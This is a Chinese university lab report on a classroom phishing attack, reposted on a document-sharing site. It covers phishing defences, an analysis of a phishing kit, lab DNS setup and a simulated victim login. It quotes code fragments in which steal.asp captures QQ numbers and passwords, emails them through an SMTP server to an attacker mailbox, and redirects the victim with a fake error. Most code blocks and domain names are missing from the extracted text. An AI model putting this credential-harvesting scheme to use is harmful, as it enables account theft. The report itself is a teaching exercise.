实验三网站钓鱼攻击实验报告

上传人:痛*** 文档编号:46107899 上传时间:2021-12-10 格式:DOC 页数:18 大小:1.02MB
收藏 版权申诉 举报 下载
实验三网站钓鱼攻击实验报告_第1页
第1页 / 共18页
实验三网站钓鱼攻击实验报告_第2页
第2页 / 共18页
实验三网站钓鱼攻击实验报告_第3页
第3页 / 共18页
资源描述:

《实验三网站钓鱼攻击实验报告》由会员分享,可在线阅读,更多相关《实验三网站钓鱼攻击实验报告(18页珍藏版)》请在装配图网上搜索。

1、南京工程学院实 验 报 告 题 目 网站钓鱼攻击 课 程 名 称 网络与信息安全技术 院(系、部、中心) 计算机工程学院 专 业 网络工程 班 级 学 生 姓 名 学 号 设 计 地 点 信息楼A216 指 导 教 师 毛云贵 实 验 时 间 2014年3月20日 实 验 成 绩 一实验目的1.了解钓鱼攻击的概念和实现原理2.了解钓鱼网站和正常网站的区别3.提高抵御钓鱼攻击的能力二实验环境Windows,交换网络结构,UltraEdit三实验原理3.1什么是钓鱼网站 网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM

2、 PIN码或信用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。受害者经常遭受严重的经济损失或个人信息被窃取。 钓鱼网站通常伪装成为银行网站,窃取访问者提交的账号和密码信息。它一般通过电子邮件传播,此类邮件中包含一个经过伪装的链接,该链接将收件人链接到钓鱼网站。钓鱼网站的页面与真实网站界面完全一致,要求访问者提交账号和密码。一般来说钓鱼网站结

3、构很简单,只是一个或几个页面,URL和真实网站有细微差别,如真实的工行网站为,针对工行的钓鱼网站则可能为。3.2钓鱼网站的防范措施1.启用专用域名 现在的网址有好几种,是一个商业性网站,而www.xxx.gov是政府网站,www.xxx.org则是非政府组织网站。域名不同,代表的意思也不同。因此可以借鉴政府网站有专用域名做法,为网上银行设置专用域名。这种作法虽然从根本上无法杜绝钓鱼网站的存在,但确实在很大程度上打击了假冒的网银网站。2.规范搜索引擎 在网银安全问题上,银行惟一能采取的办法就是投入大量的人力物力,不间断地在网上通过人工或是自动搜索同自己域名类似的假冒网站、网络实名,甚至必须介入电

4、子邮件搜索是否有人假借银行名义行欺骗之实,即使是几个银行联合起来打假,平摊的只是成本,技术始终是个难题。因此可以规范搜索引擎,从搜索引擎层面上来干预与网上银行域名类似的网站。3.银行数字证书 银行可以通过使用银行证书的方式来验明网上银行的正身,只有拥有正确的证书才能证明该网站是正确的网上银行而不是钓鱼网站。4.客户安全使用网银 (1)避免使用搜索引擎 从正规银行网点取得网络银行网址并牢记,登录网银时尽量避免使用搜索引擎或网络实名,以免混淆视听。 (2)设置混合密码、双密码 密码设置应避免与个人资料相关,建议选用数字、字母混合密码,提高密码破解难度并妥善保管,交易密码尽量与信用卡密码不同。 (3

5、)定期查看交易记录定期查看网银办理的转帐和支付等业务记录,或通过短信定制账户变动通知,随时掌握账户变动情况。 (4)妥善保管数字证书 避免在公用计算机上使用网银,以防数字证书等机密资料落入他人之手。 (5)警惕电子邮件链接 网上银行一般不会通过电子邮件发出“系统维护、升级”提示,若遇重大事件,系统必须暂停服务,银行会提前公告顾客。一旦发现资料被盗,应立即修改相关交易密码或进行银行卡挂失。三钓鱼网站的关键源码分析 钓鱼网站的位置:“C:ExpNISSocEng-LabFishing钓鱼网站qqqet”,用UltraEdit-32可查看或编辑源码。 钓鱼网站构造比较简单,主要组成部分其实就是两个文

6、件index.htm,steal.asp。index.htm为钓鱼网站的前台表现页面,steal.asp为钓鱼网站的后台控制程序。具体分析一下这两个文件。1.index.htm文件 用户使用域名“”登录钓鱼网站后,进入的页面就是index.htm,该页是钓鱼网站的表现页面,其主要完成表单提交,用户信息是否为空的验证,验证用户信息不为空的话,就将用户输入的信息传入steal.asp。页面源码中很多都是为页面的表现形式,表现效果服务的,这些源码不做分析。下面分析一下关键代码:上行代码解析:(1)“name”是表单的名称,这里给该表单命名为“form1”。 (2)“onsubmit=return c

7、heckinput()”是提交表单之前执行的方法,在下一大段代码中会具体介绍checkinput()方法。 (3)“action=steal.asp”是提交表单后跳转的文件,这里是跳转到steal.asp。 (4)“method=post”是表单提交方法,该方法有两种,一种是post,一种是get。post是隐含参数提交,就是提交的时候url中不显示用户名,密码信息。get是显示参数提交,就是提交的时候url中显示用户名,密码信息。上段代码大部分都是效果和表现形式,关键的部分用粗体字代替。这段代码是建立一个文本输入框,“type=text”是给输入框的类型定义为文本形式,“name=u”是将文

8、本输入框的名称定义为“u”,“u.value”就是文本框输入的内容。上段代码是建立一个密码输入框,“type=password”是给输入框定义为密码形式,“name=p”是将密码输入框的名称定义为“p”,“p.value”就是密码框输入的内容。上段代码的意思是建立一个登录的按钮,用于提交用户信息的。表单部分的代码中onsubmit=return checkinput()”,它的意思是调用下面这段代码。上段代码解析: (1)“if(document.form1.u.value=)”if条件判断,“document.form1.u.value”是取得文本框中内容,也就是QQ号码,对它进行判断,判断

9、它的内容是不是空值,如果是空值,就执行下面中的内容。 (2)“alert(您还没有输入QQ号码)”alert是弹出对话框,对话框的内容是“您还没有输入QQ号码”。 (3)“document.form1.u.focus()”将鼠标焦点定位到文本框的位置。(4)“return false”返回值是“false”,即不提交表单内容,返回“index.htm”。2.steal.asp文件 用户提交表单后,将用户信息传入steal.asp中,在steal.asp中进行业务逻辑处理。 具体处理的内容:将用户信息以邮件的形式发送到指定邮箱,弹出误导对话框,引导到正常网站。关键代码解析:上段代码解析:代码中引

10、用VBScript脚本语言,“u=request.form(u)”在该页取得表单提交的文本框内容,即QQ号码,定义为“u”,“p=request.form(p)”在该页取得表单提交的密码框内容,即QQ密码,定义为“p”。下面这段代码是引用vbs脚本,功能是负发送邮件(将用户输入的内容,以邮件的形式发送到指定邮箱)。 上段关键代码解析: (1)“NameSpace= (2)“Set Email = CreateObject(CDO.Message)”开启邮件服务。 (3)“Email.From = anyoneCServer.NetLab”邮件发送方的邮箱。(4)“Email.To = xxxx

11、xCServer.NetLab”邮件接收方的邮箱。 (5)“Email.Subject = username and password”发送邮件的主题。 (6)“Email.Textbody = username: & u & &password: & p”发送邮件的具体内容,即username:“用户的QQ号码”,password:“用户的QQ密码”。 (7)“Item(NameSpace&smtpserver) = 172.16.0.254”接收邮件的服务器。 (8)“Item(NameSpace&smtpauthenticate) = 0”设置邮件发送者是否为匿名用户发送,设置为0则为匿

12、名用户发送,若设置为0则不用设置“Email.From”的邮箱(发送者的邮箱)。设置为1则为真实存在的用户发送,发送者的邮箱,邮箱的用户名,密码必须是真实存在的,即“Email.From”,“Item(NameSpace&sendusername)”,“Item(NameSpace&sendpassword)”必须设置真实存在的邮箱名,邮箱用户名,邮箱密码。此处作为攻击用,必须设置为0。 (9)“Item(NameSpace&sendusername) = any”和“Item(NameSpace&sendpassword) = any”邮件发送者的邮箱用户名,因为“Item(NameSpac

13、e&smtpauthenticate)”设置为0,所以这两句脚本没用到,用注释掉了。 (10)“Update”将上面设置的内容在程序执行的时候更新确认。 (11)“Email.Send”邮件发送出去。 下面的代码主要是欺骗误登录钓鱼网站的用户,将用户引导到正常网站。 上段代码很多处都是html标签,用于网页显示。关键代码是javascript部分,解析如下: (1)“alert(用户名或密码输入错误!)”弹出提示对话框,对话框内容是“用户名或密码输入错误!”。 (2)“window.location=;”将用户引导到正常网站,用的是javascript中“window.location”方法。

14、用法就是window.location=“要跳转到的地址(域名或ip地址)”。 钓鱼网站关键的源码分析完毕,正常网站的源码只有一个index.htm文件,和钓鱼网站中的index.htm文件类似,不做具体分析。四实验方法及步骤本练习主机A、B、C为一组,D、E、F为一组,下面以主机A、B、C为例,说明实验步骤实验主机实验角色主机A钓鱼网站,黑客主机B正常网站,DNS服务器主机C被欺骗者首先使用“快照X”恢复Windows系统环境。一初始化环境的准备1主机A的操作(1)主机A配置Outlook Express邮箱,建立邮件帐户(参见附录A-Outlook Express配置方法)。这里以“use

15、r1ACServer.NetLab”邮箱为例说明实验步骤。 (2)更改钓鱼网站源码中接收邮件的邮箱(源码分析详见实验原理)。进入钓鱼网站目录“C:ExpNISSocEng-LabFishing钓鱼网站qqqet”,点击右键使用UltraEdit打开steal.asp,如图4-1所示:图4-1 邮件发送源码 将上图中标记内容,更改为主机A配置好的邮箱,保存后退出。 (3)发布钓鱼网站。单击“开始”|“程序”|“管理工具”|“Internet信息服务(IIS)管理器”,启动钓鱼网站。 注启动钓鱼网站之前要先关闭默认网站和正常网站,默认网站,钓鱼网站,正常网站端口号都是80,只允许开启一个网站。(4

16、)主机A配置DNS服务器为主机B的ip。2主机B的操作 (1)安装DNS,具体步骤: 点击“开始”|“设置”|“控制面板”|“添加或删除程序”|“添加/删除Windows组件(A)”,弹出“Windows组件向导”的窗口,在组件中将鼠标焦点定位到“网络服务”的选项上,如图4-2所示:图4-2 Windows组件向导 点击“详细信息”,然后在网络服务的子组件中选择域名系统(DNS),选择后点击“确定”。 点击“下一步”,进入安装界面,约2秒后,弹出所需文件窗口,点击“浏览”,进入到“C:ExpNISSocEng-LabToolsDNS安装组件”,选择DNSMGR.DL_,点击“打开”。然后点击“

17、确定”,安装过程中会出现“Windows文件保护”的提示对话框,如图4-3所示:图4-3 DNS组件安装过程 将此对话框关闭,继续点击“浏览”,还是进入到“C:ExpNISSocEng-LabToolsDNS安装组件”,选择DNSMGMT.MS_,点击“打开”,然后再点击“确定”,安装即将完成的时候会弹出“可选网络组件”的提示对话框,如图4-4所示:图4-4 可选网络组件对话框(2)配置DNS,具体步骤: 单击“开始”|“程序”|“管理工具”|“DNS”,进入DNS配置界面,点击主机展开树,如图4-5所示:图4-5 DNS配置 右键点击“正向查找区域”,选择新建区域,弹出新建区域向导,点击“下

18、一步”,然后选择默认的主要区域,继续点击“下一步”。 在区域名称处填写“”,一直点击击“下一步”,最后点击“完成”。 右键点击“”,选择新建主机,弹出新建主机的窗口,在名称处填写“www”,在ip地址处填写“主机B的IP地址”(此域名为正常网站的域名,根据角色分配得知,正常网站存在于主机B中),点击“添加主机”,弹出成功添加主机记录的对话框,点击“确定”,再点击“完成”就成功创建了主机。 根据上面的方法,再新建一个区域名为“”的区域,并在这个区域中新建名为“www”的主机,ip地址为主机A的IP地址(此域名为钓鱼网站的域名,根据角色分配得知,钓鱼网站存在于主机A中)。 (3)发布正常网站。打开

19、IIS,启动正常网站。 注启动正常网站之前要先关闭钓鱼网站和默认网站,默认网站,钓鱼网站,正常网站端口号都是80,只允许开启一个网站。3主机C的操作 主机C配置DNS服务器为主机B的IP地址。二钓鱼式手法模拟1主机C登录钓鱼网站 假设主机C误输入,造成主机C进入到钓鱼网站。主机C在浏览器中使用域名“”,登录到钓鱼网站,仔细观察页面信息和域名信息。2主机C在钓鱼网站输入相关信息 主机C在钓鱼网站中输入QQ号码和QQ密码,QQ号码:123456。QQ密码:admin,(此用户名和密码均为正确的,在正常网站中使用会有所体现),单击“登录”,之后会弹出一个对话框”用户名或密码错误”,“确定”后会引导到

20、正常网站。同时刚才输入的QQ号码和QQ密码会以邮件的形式发送到主机A的邮箱。3主机C在正常网站输入相关信息 主机C跳转到正常网站后,仔细观察域名和页面信息。观察后得知,和钓鱼网站相比,页面信息没什么变化,只是域名发生了细微的变化,“”变成了“”,如果不仔细观察,很难发现这一点。主机C继续操作,QQ号码输入“123456”,QQ密码输入“admin”,登录后会有登录成功的提示。4主机A登录邮箱,查看邮件 主机A登录Outlook Express邮箱,打开收到的新邮件,内容是主机C在钓鱼网站输入的QQ号码和QQ密码,对比一下主机C记录的QQ号码和QQ密码。5主机A登录正常网站 主机A用域名“”登录

21、正常网站,用钓到的“主机C的用户信息”进行登录。6主机C的防范方法 用户应该注意提高自己的安全意识,不要通过搜索引擎、匿名邮件、陌生电话等提供的网址访问网上银行等,要注意对域名信息的仔细辨别,以防止不慎访问钓鱼网站。五实验数据记录及分析首先主机A配置Outlook Express邮箱,建立邮件帐户,具体如图5-1图5-1主机A发布钓鱼网站,如图5-2所示图5-2主机B DNS服务器配置如图5-3所示图5-3实验成功截取了主机c主机输入的qq用户名与密码,图5-4所示图5-4六实验总结通过本次实验,我能将课堂上学习的知识在试验中得到验证,加深对相关知识点的理解。不仅掌握了钓鱼网站相关知识以及维护

22、中常用的工具而且对网络安全有了更加深入的理解。 总之,这次实验让我受益匪浅,不仅学到了新的知识,还让以前书本上学的理论知识在实践中加以应用,做到学以致用。还有,养成的一些良好习惯,对以后的学习和工作都是有帮助的。这次实验不仅让我复习了钓鱼网站的相关知识,而且将网络安全技术的知识融汇贯通,让我们在课堂上学习的知识有了实践的机会,充分锻炼了自己的动手能力,并且将书本上抽象的理论上升到了应用的高度,让知识紧密围绕应用,以兴趣激发学习。教师评阅:90-95分:实验课前做了充足的准备工作,与专业相关知识能紧密联系。实验报告条理清晰,书写规范,图文并茂,报告内容全面,主要内容阐述详细。认识体会深刻,起到了实验的目的。80-85分:实验课前做了充足的准备工作,与专业相关知识能较紧密联系。实验报告条理清晰,书写规范,图文并茂,报告内容较全面,主要内容阐述较详细。认识体会较深刻,达到了实验的作用。70-75分:实验课前准备较充足,与专业相关知识能基本能联系,实验报告条理清晰,书写较规范,报告内容较全面,能用部分图片展示相关内容,主要内容阐述较详细。认识体会较深刻,达到了实验的目的。60-65分:实验课前准备不够充足,与专业相关知识不能紧密联系。实验报告条理基本清晰,书写基本规范,报告内容基本全面,主要内容阐述基本详细。认识体会不太深刻,基本达到实验的目的。

展开阅读全文
温馨提示:
1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
2: 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
3.本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!